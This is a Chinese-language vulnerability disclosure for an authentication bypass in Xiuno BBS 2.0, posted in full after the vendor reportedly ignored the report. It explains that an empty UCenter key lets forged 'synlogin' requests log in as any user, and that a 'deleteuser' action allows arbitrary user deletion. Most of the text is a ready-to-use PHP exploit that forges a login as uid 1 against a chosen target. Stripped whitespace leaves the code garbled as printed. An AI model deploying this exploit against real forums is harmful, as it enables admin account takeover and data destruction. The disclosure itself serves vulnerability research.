Xiuno BBS 2.0 前台认证授权绕过漏洞漏洞预警 -电脑资料
在乌云上提交了这厂商的一个漏洞(http://www.wooyun.org/bugs/wooyun-2010-019717),被华丽的无视了,以后挖到它的漏洞直接公开
0×0 漏洞概述
0×1 代码解析
0×2 PoC
0×0 漏洞概述
xiuno实现了使用uc接口完成uc center登录的插件
xiuno默认没有启用uc插件
在不启用时,uc插件的key:uc_appkey为空,因此在不启用uc插件的时候,uc插件自带的加解密函数可以利用这个特性被绕过
uc用key解密传递进来的参数,其中解密后的action若等于synlogin,uid有效的话,将会使用该uid登录xiuno论坛的前台
0×1 代码解析
此版本为2.0
$code=core::gpc('code');//将传入的code参数用key解密然后放入get数组中parse_str(uc_authcode($code,'DECODE',$ucconf['uc_appkey']),$get);$action=$get['action'];//若action为synlogin,则用get数组中uid作为当前用户登录elseif($action=='synlogin'){$uid=intval($get['uid']);$muser=newuser();$userdb=$muser->read($uid);$muser->set_login_cookie($userdb);exit(API_RETURN_SUCCEED);}//同时此处还有一个任意用户删除漏洞elseif($action=='deleteuser'){$uids=$get['ids'];$uids=str_replace("'",'',$uids);$arr=explode(',',$uids);$muser=newuser();foreach($arras$uid){$uid=intval($uid);$muser->xdelete($uid);}exit(API_RETURN_SUCCEED);}
POC:
<?php/*
* Xiuno bbs RC2 前台授权绕过漏洞exp
* Author: ztz@Dis9Team
* Mail: ztz5651483@gmail.com
* Blog: ztz.fuzzexp.org
* 使用说明:
* $_GET['target']: 目标的域名
* $_GET['ip']: 目标的ip
*
* 如:
* http://yoursite.com/xiuno.php?target=www.xiuno.com&ip=114.113.224.156
* 然后手动访问主页即可
*/functionuc_authcode($string,$operation='DECODE',$key='',$expiry=0){$ckey_length=4;$key=md5($key);$
keya=md5(substr($key,0,16));$keyb=md5(substr($key,16,16));$keyc=$ckey_length?($operation=='DECODE'?substr($string,0,$ckey_length):substr(md5(microtime()),-$ckey_length)):'';$cryptkey=$keya.md5($keya.$keyc);$key_length=strlen($cryptkey);$string=$operation=='DECODE'?base64_decode(substr($string,$ckey_length)):sprintf('%010d',$expiry?$expiry+time():0).substr(md5($string.$keyb),0,16).$string;$string_length=strlen($string);$result='';$box=range(0,255);$rndkey=array();for($i=0;$i<=255;$i++){$rndkey[$i]=ord($cryptkey[$i%$key_length]);}for($j=$i=0;$i<256;$i++){$j=($j+$box[$i]+$rndkey[$i])%256;$tmp=$box[$i];$box[$i]=$box[$j];$box[$j]=$tmp;}for($a=$j=$i=0;$i<$string_length;$i++){$a=($a+1)%256;$j=($j+$box[$a])%256;$tmp=$box[$a];$box[$a]=$box[$j];$box[$j]=$tmp;$result.=chr(ord($string[$i])^($box[($box[$a]+$box[$j])%256]));}if($operation=='DECODE'){if((substr($result,0,10)==0||substr($result,0,10)-time()>0)&&substr($result,10,16)==substr(md5(substr($result,26).$keyb),0,16)){returnsubstr($result,26);}else{return'';}}else{return$keyc.str_replace('=','',base64_encode($result));}}functionsend($request,$ip){$result='';$meta=parse_url($request);$path=isset($meta['path'])?$meta['path']:exit('path error');$host=isset($meta['host'])?$meta['host']:exit('host error');$query=isset($meta['query'])?$meta['query']:exit('query error');$packet="GET $path?$query HTTP/1.1\r\n";$packet.="User-Agent: Mozilla/5.0\r\n";$packet.="Host: ".$ip."\r\n";$packet.="Connection: Close\r\n\r\n";$fp=fsockopen($ip,80);fputs($fp,$packet);while(!feof($fp)){$result.=fgets($fp,4096);}if(strpos($result,'Set-Cookie')>0){$begin=strpos($result,'Set-Cookie:');$end=strpos($result,";",$begin);$cookie=substr($result,$begin+11,$end-$begin-11);return$cookie;}}$target=$_GET['target'];$ip=$_GET['ip'];$time=time();$str="time=$time&action=synlogin&uid=1";$en_str=uc_authcode($str,'ENCODE','');$request="http://$target/plugin/ucenter/api/uc.php?code=".urlencode($en_str);header("Location: $request",true,302);?>